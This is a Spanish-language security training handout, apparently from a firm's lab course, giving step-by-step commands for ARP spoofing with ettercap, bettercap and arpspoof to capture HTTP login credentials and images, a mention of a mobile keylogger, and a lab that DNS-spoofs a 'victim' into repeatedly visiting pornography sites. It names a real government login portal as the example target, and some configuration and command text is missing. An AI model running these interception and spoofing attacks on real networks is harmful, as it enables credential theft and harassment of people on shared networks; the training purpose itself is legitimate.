Está en la página 1de 5

THD SECURITY GROUP S.A.

S
NIT.900.923.967-2
Carrera 14 N 12 A 35
Sedes: Colombia – Ecuador – Panamá - Bolivia
Telefax: (096) 8804020, Celular 3116865526
www.thdsecurity.com
www.itforensic-la.com.com
thd@thdsecurity.com

LABORATORIO X-29
Arp Spoofing con Ettercap & ArpSpoof
El objetivo de este laboratorio, es realizar un ARP Spoofing para capturar contraseñas
en portales de Login que utilicen el protocolo HTTP (ej. http://www.celfi.gob.ar/login).
Utilizando la herramienta Ethercap. Como segundo objetivo capturara imágenes que
visualiza.

1) Antes de comenzar asegúrese que Kali tiene habilitada opción de IP Forwarding:

“echo 1 > /proc/sys/net/ipv4/ip_forward”

2) Edite el archivo “/etc/ettercap/etter.conf” y asegúrese de realizar los siguientes


cambios:

Y quite los comentarios de las siguientes líneas:

Grabe los cambios realizados y regrese a la consola de Kali.

3) Anote muy bien la Ip y la Mac Address de la consola de Kali:

“ifconfig eth0” IP:_______________ MAC: __________________________

4) Con el comando Nmap, busque las IP’s y las Mac de las posibles víctimas de su
red Lan.

“nmap –sP IP/CIDR” IP:_________________ MAC:__________________

Para la elaboración de este laboratorio, asegúrese que la maquina victima


escogida, sea la máquina virtual de Windows 7.

CONFIDENCIAL
THD SECURITY GROUP S.A.S
NIT.900.923.967-2
Carrera 14 N 12 A 35
Sedes: Colombia – Ecuador – Panamá - Bolivia
Telefax: (096) 8804020, Celular 3116865526
www.thdsecurity.com
www.itforensic-la.com.com
thd@thdsecurity.com

5) Ejecute el comando “ettercap”, para realizar ARP Spoofing a la víctima:

“ettercap –Tq –i eth0 –w Nombre_Archivo –M arp /IP_Gateway//


/IP_Victima//”

6) Desde la maquina real ingrese a un portal de Login que utilicen el protocolo


HTTP e ingrese sus credenciales, seguido a esto abra el archivo que se creó en
la carpeta Home, con el nombre que usted haya especificado, aplique el filtro
“http” y busque las solicitudes enviadas por el método POST. Allí estarán
almacenadas las credenciales ingresadas en el portal.

CONFIDENCIAL
THD SECURITY GROUP S.A.S
NIT.900.923.967-2
Carrera 14 N 12 A 35
Sedes: Colombia – Ecuador – Panamá - Bolivia
Telefax: (096) 8804020, Celular 3116865526
www.thdsecurity.com
www.itforensic-la.com.com
thd@thdsecurity.com

Arpspoof Con Bettercap


1) Instale la herramienta Bettercap con el siguiente comando:

“apt-get install bettercap”

2) Inicie la herramienta y configure los siguientes parámetros:

“bettercap”

“set arp.spoof.targets IP_VICTIMA”

“arp.spoof on”
“net.sniff on”

3) En la maquina víctima ingrese a un portal de Login que utilicen el protocolo


HTTP (ej. http://www.celfi.gob.ar/login) ingrese las credenciales y visualice los
resultados en la consola:

CONFIDENCIAL
THD SECURITY GROUP S.A.S
NIT.900.923.967-2
Carrera 14 N 12 A 35
Sedes: Colombia – Ecuador – Panamá - Bolivia
Telefax: (096) 8804020, Celular 3116865526
www.thdsecurity.com
www.itforensic-la.com.com
thd@thdsecurity.com

Arp Con Arpspoof


Antes de ejecutar “arpsoof” se debe instalar el siguente paquete: “apt-get install dsniff”
1) Ejecute los siguientes comandos y visualice los resultados,

“echo 1 > /proc/sys/net/ipv4/ip_forward”

“arpspoof -i eth0 -t IP_Victima IP_Gateway”

En otra consola

“arpspoof -i eth0 -t IP_Gateway IP_Victima”

En otra consola

“driftnet”

En otra consola

“urlsnarf”

Keylogger A Tu Móvil Con Mimtf


Una buena idea es poder capturar las pulsaciones del teclado de cualquier víctima y más aún si
ella está conectada a nuestra red desde un dispositivo móvil, la línea de comando que me
permite esto es:

Nota: de pronto es requerido el paquete “python_impacket”

CONFIDENCIAL
THD SECURITY GROUP S.A.S
NIT.900.923.967-2
Carrera 14 N 12 A 35
Sedes: Colombia – Ecuador – Panamá - Bolivia
Telefax: (096) 8804020, Celular 3116865526
www.thdsecurity.com
www.itforensic-la.com.com
thd@thdsecurity.com

LABORATORIO X-31
Visita Recurrente Porno Site
El objetivo de este laboratorio, es hacer que su víctima navegue recurrentemente a
páginas de porno.

1) Antes de comenzar asegúrese que Kali tiene habilitada opción de IP Forwarding:

“echo 1 > /proc/sys/net/ipv4/ip_forward”

2) Con el comando “host”, averigue la dirección IP de un sitio preferido que utilizara


para redirección.

3) Crearemos un archivo en llamado “/etc/dnspoof” con la siguiente estructura;


tenga en cuenta utilizar la IP que descubrió.

4) Ejecute el siguiente comando con una víctima seleccionada dentro de la red


LAN, para hacer un ataque de suplantación de ARP.

“arpspoof -i eth0 -t IP_Victima IP_Gateway -r”

5) En otra ventana ejecutemos el siguiente comando para hacer un ataque de


suplantación de DNS.

“dnsspoof –i eth0 -f /etc/dnspoof”

6) Observe que la víctima cada vez que trate de abrir una página, será
redirecionado a la página de porno.

CONFIDENCIAL

También podría gustarte